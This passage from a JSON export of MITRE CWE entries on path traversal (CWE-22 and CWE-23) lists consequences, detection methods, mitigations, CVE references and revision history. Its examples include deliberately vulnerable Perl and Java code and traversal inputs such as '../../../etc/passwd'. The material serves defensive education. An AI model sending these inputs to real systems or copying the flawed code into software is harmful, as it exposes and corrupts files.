mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"Automated techniques can find areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the software\'s administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-20.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.","Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59). This includes:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["realpath() in C","getCanonicalPath() in Java","GetFullPath() in ASP.NET","realpath() or abs_path() in Perl","realpath() in PHP"]}}}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy."]}},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-27"},"Intro_Text":"The following code could be for a social networking application in which each user\'s profile information is stored in a separate file. All files are stored in a single directory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $dataPath = \\"/users/cwe/profiles\\";my $username = param(\\"user\\");my $profilePath = $dataPath . \\"/\\" . $username;open(my $fh, \\"&lt;$profilePath\\") || ExitError(\\"profile read error: $profilePath\\");print \\"&lt;ul&gt;\\\\n\\";while (&lt;$fh&gt;) {}print \\"&lt;/ul&gt;\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"print \\"&lt;li&gt;$_&lt;/li&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/users/cwe/profiles/../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/etc/passwd"}],"Body_Text":["While the programmer intends to access files such as \\"/users/cwe/profiles/alice\\" or \\"/users/cwe/profiles/bob\\", there is no verification of the incoming user parameter. An attacker could provide a string such as:","The program would generate a profile pathname like this:","When the file is opened, the operating system resolves the \\"../\\" during path canonicalization and actually accesses this file:","As a result, the attacker could read the entire text of the password file.","Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined."]},{"attr":{"@_Demonstrative_Example_ID":"DX-18"},"Intro_Text":"In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String filename = System.getProperty(\\"com.domain.application.dictionaryFile\\");File dictionaryFile = new File(filename);","xhtml:br":""}},"Body_Text":"However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory."},{"attr":{"@_Demonstrative_Example_ID":"DX-2"},"Intro_Text":"The following code takes untrusted input and uses a regular expression to filter \\"../\\" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $Username = GetUntrustedInput();$Username =~ s/\\\\.\\\\.\\\\///;my $filename = \\"/home/user/\\" . $Username;ReadAndSendFile($filename);","xhtml:br":["","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/home/user/../../etc/passwd"}],"Body_Text":["Since the regular expression does not have the /g global match modifier, it only removes the first instance of \\"../\\" it comes across. So an input value such as:","will have the first \\"../\\" stripped, resulting in:","This value is then concatenated with the /home/user/ directory:","which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23)."]},{"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and once validated delete the given file. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);f.delete()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"/safe_dir/../important.dat"}],"Body_Text":["An attacker could provide an input such as this:","The software assumes that the path is valid because it starts with the \\"/safe_path/\\" sequence, but the \\"../\\" sequence will cause the program to delete the important.dat file in the parent directory"]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null &amp;&amp; contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-0467","Description":"Newsletter module allows reading arbitrary files using \\"../\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0467"},{"Reference":"CVE-2009-4194","Description":"FTP server allows deletion of arbitrary files using \\"..\\" in the DELE command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4194"},{"Reference":"CVE-2009-4053","Description":"FTP server allows creation of arbitrary directories using \\"..\\" in the MKD command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4053"},{"Reference":"CVE-2009-0244","Description":"FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using \\"..\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0244"},{"Reference":"CVE-2009-4013","Description":"Software package maintenance program allows overwriting arbitrary files using \\"../\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4013"},{"Reference":"CVE-2009-4449","Description":"Bulletin board allows attackers to determine the existence of files using the avatar.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4449"},{"Reference":"CVE-2009-4581","Description":"PHP program allows arbitrary code execution using \\"..\\" in filenames that are fed to the include() function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4581"},{"Reference":"CVE-2010-0012","Description":"Overwrite of files using a .. in a Torrent file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0012"},{"Reference":"CVE-2010-0013","Description":"Chat program allows overwriting files using a custom smiley request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013"},{"Reference":"CVE-2008-5748","Description":"Chain: external control of values for user\'s desired language and theme enables path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748"},{"Reference":"CVE-2009-1936","Description":"Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A4","Entry_Name":"Insecure Direct Object Reference","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO02-C","Entry_Name":"Canonicalize path names originating from untrusted sources"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS00-PL","Entry_Name":"Canonicalize path names before validating them","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":33,"Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-22"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"126"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Directory Traversal and Using Parent Paths (..)&#34; Page 370"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-185"}},{"attr":{"@_External_Reference_ID":"REF-186"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Filenames and Paths&#34;, Page 503"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-22"}}]},"Notes":{"Note":[{"#text":"Pathname equivalence can be regarded as a type of canonicalization error.","attr":{"@_Type":"Relationship"}},{"#text":"Some pathname equivalence issues are not directly related to directory traversal, rather are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing \\"/\\" on a filename could bypass access rules that don\'t expect a trailing /, causing a server to provide the file when it normally would not).","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use \\"directory traversal\\" only to refer to the injection of \\"..\\" and equivalent sequences whose specific meaning is to traverse directories.","Other variants like \\"absolute pathname\\" and \\"drive letter\\" have the *effect* of directory traversal, but some people may not call it such, since it doesn\'t involve \\"..\\" or equivalent."]},{"#text":"Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap.","attr":{"@_Type":"Research Gap"}},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that \\"..\\\\\\" is vulnerable, but not test \\"../\\" which may also be vulnerable.","Any combination of directory separators (\\"/\\", \\"\\\\\\", etc.) and numbers of \\".\\" (e.g. \\"....\\") can produce unique variants; for example, the \\"//../\\" variant is not listed (CVE-2004-0325). See this entry\'s children and lower-level descendants."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Path Traversal","attr":{"@_Date":"2010-02-16"}}}},"23":{"attr":{"@_ID":"23","@_Name":"Relative Path Traversal","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as \\"..\\" that can resolve to a location that is outside of that directory.","Extended_Description":"This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass 